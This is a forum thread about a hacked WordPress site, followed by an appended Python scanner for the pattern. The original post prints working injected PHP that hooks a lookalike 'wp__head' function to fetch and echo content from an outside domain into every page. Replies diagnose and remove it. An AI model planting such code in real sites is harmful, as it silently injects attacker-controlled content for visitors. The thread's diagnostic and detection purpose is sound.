Site got hacked please help to confirm

Hello

My site is redirecting at random times to a parked domain.

After doing some research I found out that this code might be doing it:

Code:
function wp__head() {
 if(function_exists('curl_init'))
 {
  $url = "http://www.jqury.net/?1"; 
  $ch = curl_init();  
  $timeout = 10;  
  curl_setopt($ch,CURLOPT_URL,$url); 
  curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
  curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']);
  curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); 
  $data = curl_exec($ch);  
  curl_close($ch); 
  echo "$data";
 }
}
add_action('wp_head', 'wp__head');

Can someone tell me what this code does and if this is the root of the problem?

Thank you
  • RenardNET
    That is for sure something you don't want to have. So remove that code instantly. It looks like it is safe to remove because the function wp__head() is added by a WP hook.

    When you visit the URL www . jqury . net/?1, then in the HTML source you will see a set of HTML links. Those links are injected into your HTML header. But it does not have any code to redirect to those domains, so you need to keep looking for other bad code if removing it does not help, as I am afraid.

    Good luck.

    Tom
  • RenardNET
    Ohh, and tell us in what WP theme or plugin you found this code so people will know what to avoid.

    Tom
  • P4tch
    If you have access to your own server and can view PHP and webserver logs, look at which files are using cURL and sending requests. It should be pretty simple to find the files that you need.
  • lordspace
    I'd export my site/blog's contents and reinstall it from scratch.

    Was your WordPress up-to-date?
    Did you use some cracked/hacked premium plugins?

    This script basically attaches itself to something called a hook in WordPress terms, which is basically an event. So when WordPress is about to output the page header, it will actually output the contents coming from the mentioned site.
  • Yes, you're being hacked. Did you get it sorted out? Give me a call, I'll fix it up.
  • RobinInTexas
    It's a hack apparently designed to appear normal, perhaps part of something more complex than what appears. It's adding a new function that is similar to the stock "wp_head"; "wp__head" is new.

    I would suggest installing Wordfence plugin and having it scan your site.

    Its scan does the following (and more):
    • Comparing core WordPress files against originals in repository
    • Comparing open source themes against WordPress.org originals
    • Comparing plugins against WordPress.org originals
    • Scanning for known malware files
    • Scanning file contents for infections and vulnerabilities
    • Scanning files for URLs in Google's Safe Browsing List
    • Scanning posts for URLs in Google's Safe Browsing List
    • Scanning comments for URLs in Google's Safe Browsing List
    • Scanning for old themes, plugins and core files

    You have to edit the options after installation, as the default scan doesn't check a couple of vital items.

    It will also protect your site from other bad things.
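An added example, not part of the thread or any poster's code: a small Python scanner for the pattern discussed above, a callback registered with add_action() that echoes whatever curl_exec() returned, plus a check for callback names that imitate the hook name (wp__head vs. wp_head). The sample input is constructed with a placeholder host, and the names scan_source and scan_tree are this example's own.

```python
import re
from pathlib import Path

FUNC_RE = re.compile(r"function\s+(\w+)\s*\([^)]*\)\s*\{")
HOOK_RE = re.compile(r"add_action\(\s*['\"](\w+)['\"]\s*,\s*['\"](\w+)['\"]")

def function_bodies(src):
    """Map PHP function names to body text by brace counting
    (naive: braces inside string literals are not handled)."""
    bodies = {}
    for m in FUNC_RE.finditer(src):
        depth, i = 1, m.end()
        while i < len(src) and depth:
            depth += {"{": 1, "}": -1}.get(src[i], 0)
            i += 1
        bodies[m.group(1)] = src[m.end():i - 1]
    return bodies

def scan_source(src):
    """Report hooked callbacks that print data fetched with curl_exec()."""
    bodies, findings = function_bodies(src), []
    for hook, callback in HOOK_RE.findall(src):
        body = bodies.get(callback, "")
        fetched = re.search(r"(\$\w+)\s*=\s*curl_exec\(", body)
        if fetched and re.search(
                r"\b(?:echo|print)\b[^;]*" + re.escape(fetched.group(1)), body):
            squeezed = re.sub(r"_+", "_", callback)  # wp__head -> wp_head
            findings.append({
                "hook": hook, "callback": callback,
                "urls": re.findall(r"https?://[^\s'\"]+", body),
                "lookalike": squeezed == hook and callback != hook})
    return findings

def scan_tree(root):
    """Scan every .php file under root; returns {path: findings}."""
    hits = {str(p): scan_source(p.read_text(errors="replace"))
            for p in Path(root).rglob("*.php")}
    return {p: f for p, f in hits.items() if f}

# Constructed sample modelled on the snippet in the thread (placeholder host).
SAMPLE = r'''
function wp__head() {
  if (function_exists('curl_init')) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "http://remote.example/?1");
    $data = curl_exec($ch);
    echo "$data";
  }
}
add_action('wp_head', 'wp__head');
function theme_meta() { echo '<meta name="generator" content="x">'; }
add_action('wp_head', 'theme_meta');
'''
```

Run scan_tree() against the wp-content directory of a copy of the site; plugins that legitimately fetch and print remote content will also show up, so each finding still needs a manual look at the URL and the file it sits in.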
